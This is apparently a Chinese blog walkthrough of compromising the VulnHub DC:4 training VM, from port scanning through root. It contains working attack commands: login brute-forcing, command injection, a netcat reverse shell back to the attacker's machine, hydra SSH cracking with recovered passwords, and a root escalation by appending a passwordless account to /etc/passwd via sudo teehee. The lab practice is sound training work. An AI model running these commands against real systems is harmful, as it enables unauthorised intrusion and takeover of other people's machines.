vulnhub-DC:4靶机渗透记录

准备工作

在vulnhub官网下载DC:4靶机https://www.vulnhub.com/entry/dc-4,313/

导入到vmware，设置成NAT模式

打开kali准备进行渗透（ip：192.168.200.6）

信息收集

利用nmap进行ip端口探测

nmap -sS 192.168.200.6/24 

探测到ip为192.168.200.15的靶机，开放了22端口和80端口

再用nmap对所有端口进行探测，确保没有别的遗漏信息

nmap -sV -p- 192.168.200.15

先看看80端口，打开网站是一个登陆界面

dirsearch扫描没有发现别的页面

用Wappalyzer插件查看发现是Nginx1.15.10框架

使用searchsploit查找也没有关于这个版本的漏洞

看来只能尝试弱口令爆破了

弱口令爆破

这里使用BurpSuite，也可以使用hydra

抓个包发送到intruder设置positions，选择cluster bomb模式将账号密码设置为两个变量

在进入payload设置变量，因为是admin后台管理系统，所以账号是admin是确定的

在将字典导入到密码的变量中（字典可以在网上找）

根据返回长度可以看到happy就是密码，登陆到后台看看

里面的界面有三个选项都是一些系统命令，看起来好像可以通过抓包来更改命令

抓包之后发现确实可以更改

Netcat反弹shell

用nc命令反弹shell给kali

使用方法参考NC使用笔记_LainWith的博客-CSDN博客

先在终端输入nc -lvp 9999开启监听

然后在bp输入命令反弹shell

nc -e /bin/sh 192.168.200.6 9999

使用python 通过pty.spawn()获得交互式shell

python -c'import pty;pty.spawn("/bin/bash")'

在home目录下找到了三个用户的文件夹

在jim文件中找到了密码的备份文件，使用hydra连接ssh进行爆破

hydra爆破

使用示例:
Examples:
  hydra -l user -P passlist.txt ftp://192.168.0.1
  hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
  hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
  hydra -l admin -p password ftp://[192.168.0.0/24]/
  hydra -L logins.txt -P pws.txt -M targets.txt ssh

-l 后面跟着 具体的用户名
-p 后面跟着 具体的密码
-L 后面跟着 用户字典
-P 后面跟着 密码字典

先将密码保存在psw文件中，然后开始爆破

hydra -l jim -P psw -t 4 ssh://192.168.200.15

过程有点慢，但是得到密码jibril04，连接看看

ssh jim@192.168.200.15 -p 22　

成功连上

这里看到说有一个邮件，找找看在哪

在/var/mail 中找到 内容是：

给了一个charles的密码 ^xHhA&hvim0y，切换登陆看看su charles

可以看到无论是cat命令和进入root文件夹都被限制了，只能看看怎么提权

　　

权限提升

先用sudo -l看看有什么用户可以获得root权限

发现teehee不需要密码可以有root权限，可以利用teehee提权

用teehee用户添加一个admin用户

echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

然后直接切换到admin用户就有root权限了

参考文章

DC靶机渗透-DC4_InventorMAO的博客-CSDN博客

DC4-靶机_Au-CSDN博客